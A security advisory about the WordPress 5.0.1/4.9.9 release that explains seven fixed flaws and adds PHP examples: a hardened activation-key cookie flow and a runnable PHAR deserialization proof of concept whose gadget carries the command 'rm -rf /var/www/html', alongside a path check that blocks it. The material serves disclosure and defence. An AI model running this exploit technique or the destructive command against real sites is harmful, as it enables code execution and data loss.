Earlier this month, WordPress released version 5.0, bundling numerous feature upgrades. That launch also carried several backward-compatibility issues, and previous versions of WordPress had security bugs that demanded a fix.
For that reason, WordPress has now rolled out WordPress 5.0.1, a security release addressing vulnerabilities that affect nearly all previous versions back to 3.7. Sites running the 4.x branch of WordPress core are affected by some of the issues as well, so WordPress 4.9.9 was released alongside 5.0.1 to cover those users.
No attempts to exploit these vulnerabilities in the wild have been reported so far, but given the number of websites affected, that is likely to change soon. It is commendable how quickly the WordPress community came together to discover, report and fix these issues.
This release is not specific to the new editor introduced in 5.0; the vulnerabilities it fixes go back as far as version 3.7.
For details on this release, see the official blog post on WordPress.org.
There are some backwards-compatibility breaks in this release. If you develop or maintain your own install, read the developer notes that detail the backwards-compatibility changes that were necessary for security reasons:
1. WordPress <= 5.0 – Authenticated File Delete: authors could alter metadata to delete files they weren't authorized to delete.
2. WordPress <= 5.0 – Authenticated Post Type Bypass: authors could create posts of unauthorized post types with specially crafted input.
3. WordPress <= 5.0 – PHP Object Injection via Meta Data: contributors could craft metadata in a way that resulted in PHP object injection.
4. WordPress <= 5.0 – Authenticated Cross-Site Scripting (XSS): contributors could edit new comments from higher-privileged users, potentially leading to a cross-site scripting vulnerability.
5. WordPress <= 5.0 – Cross-Site Scripting (XSS) that could affect plugins: specially crafted URL inputs could lead to a cross-site scripting vulnerability in some circumstances.
6. WordPress <= 5.0 – User Activation Screen Search Engine Indexing: the user activation screen could be indexed by search engines in some uncommon configurations, exposing email addresses and, in rare cases, default generated passwords.
7. WordPress <= 5.0 – File Upload to XSS on Apache Web Servers: authors on Apache-hosted sites could upload specially crafted files that bypass MIME verification, leading to a cross-site scripting vulnerability.
Sensitive Data Exposure
Team Yoast found that the user activation screen could be indexed by search engines in some uncommon configurations, exposing email addresses and, in some cases, default generated passwords.
This allowed an attacker to reach the user activation screen for new users, which displayed email addresses and passwords, through a Google search (not to be confused with the recent Yoast SEO flaw, CVE-2018-19370).
The WordPress team fixed the issue by removing the activation key from the URL and storing it in a cookie instead, so the key is no longer part of a crawlable, loggable URL.
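The "token out of the URL, into a cookie" pattern that the fix applies, as an added example. This is illustration code written for this page, not WordPress's own wp-activate.php; the function name, cookie name, path and key format are assumptions.

```php
<?php
// Added example, not WordPress code. Demonstrates moving a one-time activation
// key from the query string into a short-lived cookie and redirecting to a
// key-free URL, so the key never sits in a page a crawler, a proxy log or a
// Referer header can pick up. Names and the key format are assumptions.

const ACTIVATION_COOKIE = 'demo-activate-key';          // assumed cookie name
const KEY_PATTERN       = '/^[A-Za-z0-9]{16,64}$/';     // assumed key format

/**
 * Decide what to do with one request to the activation endpoint.
 * Returns the headers/actions to perform instead of sending them, so the
 * logic can be exercised from the CLI without a web server.
 */
function handle_activation_request(array $get, array $cookie, string $path): array
{
    // First request: the key arrives in the URL from the emailed link.
    $key = $get['key'] ?? null;
    if (is_string($key) && preg_match(KEY_PATTERN, $key)) {
        return [
            'set_cookie' => [
                'name'    => ACTIVATION_COOKIE,
                'value'   => $key,
                'options' => [                    // setcookie() options array, PHP >= 7.3
                    'expires'  => time() + 600,   // one activation flow, not a session
                    'path'     => $path,          // only this endpoint ever receives it
                    'secure'   => true,
                    'httponly' => true,
                    'samesite' => 'Lax',
                ],
            ],
            'redirect' => $path,                  // same page, no query string to index
        ];
    }

    // Second request (after the redirect): the key comes from the cookie only.
    $key = $cookie[ACTIVATION_COOKIE] ?? null;
    if (!is_string($key) || !preg_match(KEY_PATTERN, $key)) {
        return ['error' => 'missing or malformed activation key'];
    }
    // Still mark the page noindex: defence in depth if a crawler reaches it anyway.
    return ['activate' => $key, 'robots' => 'noindex, nofollow'];
}

if (PHP_SAPI !== 'cli') {
    // HTTP glue, only used under a web server.
    $result = handle_activation_request($_GET, $_COOKIE, '/activate/');
    if (isset($result['set_cookie'])) {
        $c = $result['set_cookie'];
        setcookie($c['name'], $c['value'], $c['options']);
        header('Location: ' . $result['redirect'], true, 302);
        exit;
    }
    header('X-Robots-Tag: ' . ($result['robots'] ?? 'noindex, nofollow'));
    if (isset($result['error'])) {
        http_response_code(400);
        exit($result['error']);
    }
    // ... look up the pending signup by $result['activate'] and complete it here.
    exit;
}

// CLI self-check on constructed inputs.
$first = handle_activation_request(['key' => 'A1b2C3d4E5f6G7h8'], [], '/activate/');
assert($first['redirect'] === '/activate/' && $first['set_cookie']['value'] === 'A1b2C3d4E5f6G7h8');
$second = handle_activation_request([], [ACTIVATION_COOKIE => 'A1b2C3d4E5f6G7h8'], '/activate/');
assert($second['activate'] === 'A1b2C3d4E5f6G7h8');
$bad = handle_activation_request(['key' => '<script>'], [], '/activate/');
assert(isset($bad['error']));
echo "ok\n";
```

The important properties are the redirect to a key-free URL and the cookie scope: a Path-limited, HttpOnly, short-lived cookie is visible only to the activation endpoint, whereas a key in the query string is copied into every access log, referrer and search-engine index that sees the page.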
PHP Object Injection
Sam Thomas discovered that contributors could craft attachment metadata in a way that resulted in PHP object injection. This is related to the two arbitrary file delete vulnerabilities fixed in WordPress 4.9.6: an author was permitted to assign an arbitrary file path to an attachment.
That file path could use the phar:// stream wrapper pointing at a previously uploaded attachment. The PHAR format stores serialized objects in the archive's metadata, and PHP unserializes that metadata when the phar wrapper loads the archive, so the first filesystem function WordPress called on the path was enough to trigger object injection.
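The mechanism described above, as an added example that is not WordPress or the researcher's code: a gadget class, a PHAR whose metadata carries it, the single file_exists() call that triggers unserialization, and a path check that rejects stream wrappers and out-of-uploads paths before any filesystem call. The class, function and directory names are invented for the demonstration.

```php
<?php
// Added example, not WordPress code. Run with:
//   php -d phar.readonly=0 phar_demo.php
// Caveat: PHP 8.0 stopped unserializing phar metadata automatically on
// phar:// stat calls (it is now only unserialized by Phar::getMetadata()),
// so the "fired" line below appears on PHP 7.x, not on 8.x.

// Stand-in for a gadget class that exists somewhere in the application or a plugin.
class Gadget
{
    public $cmd = 'noop';
    public function __wakeup()
    {
        // A real chain would act on $this->cmd (write a file, include a path, ...).
        echo "Gadget::__wakeup fired with cmd={$this->cmd}\n";
        $GLOBALS['gadget_fired'] = true;
    }
}

// Build a PHAR whose metadata is the serialized gadget. An attacker uploads this
// as an ordinary-looking file; only the __HALT_COMPILER stub and manifest matter.
function build_malicious_phar(string $path): void
{
    @unlink($path);
    $phar = new Phar($path);               // needs a ".phar" name and phar.readonly=0
    $phar->startBuffering();
    $phar->addFromString('x.txt', 'x');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $g = new Gadget();
    $g->cmd = 'rm -rf /var/www/html';
    $phar->setMetadata($g);                // serialize()d into the manifest
    $phar->stopBuffering();
}

// The check the vulnerable code path lacked. Must run BEFORE file_exists(),
// unlink(), getimagesize() or anything else that stats the path.
function is_safe_upload_path(string $path, string $uploads_dir): bool
{
    // Any "scheme://" prefix is a stream wrapper (phar://, php://, data://, ...).
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return false;
    }
    // realpath() does not resolve wrappers and fails on missing files, so this
    // also fails closed; the explicit check above documents the intent.
    $real_file = realpath($path);
    $real_dir  = realpath($uploads_dir);
    if ($real_file === false || $real_dir === false) {
        return false;
    }
    return strpos($real_file, rtrim($real_dir, '/') . '/') === 0;
}

$uploads   = sys_get_temp_dir() . '/demo-uploads';   // constructed uploads dir
@mkdir($uploads);
$phar_file = $uploads . '/evil.phar';
build_malicious_phar($phar_file);

// Attacker-controlled metadata value, standing in for an attachment's file path.
$attached = 'phar://' . $phar_file . '/x.txt';

$GLOBALS['gadget_fired'] = false;
file_exists($attached);                               // vulnerable: stat loads the PHAR
printf("vulnerable path: gadget fired = %s\n", var_export($GLOBALS['gadget_fired'], true));

$GLOBALS['gadget_fired'] = false;
if (is_safe_upload_path($attached, $uploads)) {       // hardened: wrapper rejected
    file_exists($attached);
}
printf("hardened path:   gadget fired = %s\n", var_export($GLOBALS['gadget_fired'], true));

// A legitimate file inside the uploads directory still passes.
file_put_contents($uploads . '/photo.jpg', 'constructed placeholder');
var_dump(is_safe_upload_path($uploads . '/photo.jpg', $uploads));   // bool(true)
var_dump(is_safe_upload_path($uploads . '/../passwd', $uploads));   // bool(false)
```

Two things to take from it: the trigger is not unserialize() in the application but any stat-style call on a phar:// path, which is why grepping for unserialize() misses this class of bug; and the wrapper check has to sit before the first filesystem call, because by the time a "is this inside uploads?" check runs after file_exists(), the metadata has already been unserialized.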
Privilege Escalation / XSS
It was discovered that contributors could edit new comments from higher-privileged users, leading to a cross-site scripting vulnerability. Exploiting it requires an account with at least the Contributor role, which keeps the likelihood of widespread exploitation low. WordPress fixed the issue by removing the <form> tag from its HTML whitelist.
It was also found that users with Author privileges on Apache-hosted sites could upload crafted files that bypass MIME verification, resulting in a cross-site scripting vulnerability. The Author-level requirement makes this an unlikely target for attackers.
Possible XSS impact on some plugins
It was discovered that specially crafted URL inputs could, in some circumstances, lead to a cross-site scripting vulnerability. The change in WordPress affects the wpmu_admin_do_redirect function, which WordPress core itself does not call, but a plugin may still call it somewhere, which is why the fix matters for plugin authors.
Unauthorized File Deletion
It was found that Author-level users could modify attachment metadata to delete files they were not authorized to delete. This issue is a follow-on to the two arbitrary file delete vulnerabilities fixed in WordPress 4.9.6.
That earlier fix dealt with how attachment files are deleted by restricting file paths to the uploads directory. It did not, however, stop authors from changing an attachment's path to point at other files, so an author could still use this to delete other users' attachments.
Unauthorised Posts – RIPS
PHP security company RIPS Technologies discovered that authors could create posts of unauthorized types with specially crafted input.
A second finding from RIPS, credited to Karim El Ouerghemmi, was the file deletion weakness described above: authors could delete files they weren't authorised to delete.
Unless your site updates automatically, you can find WordPress 5.0.1 via Dashboard > Updates > Update Now.
What to do
Update every site running WordPress 5.0 to 5.0.1 as soon as possible, and sites on the 4.x branch to 4.9.9. Sites with automatic updates enabled for WordPress core should already have been updated, but given the nature of the vulnerabilities we recommend checking your sites manually in case something went wrong. We have released firewall rules to protect our Premium customers against the vulnerabilities most likely to be exploited. If you need to upgrade manually, the 4.9.9 update can be downloaded here, or you can contact us here.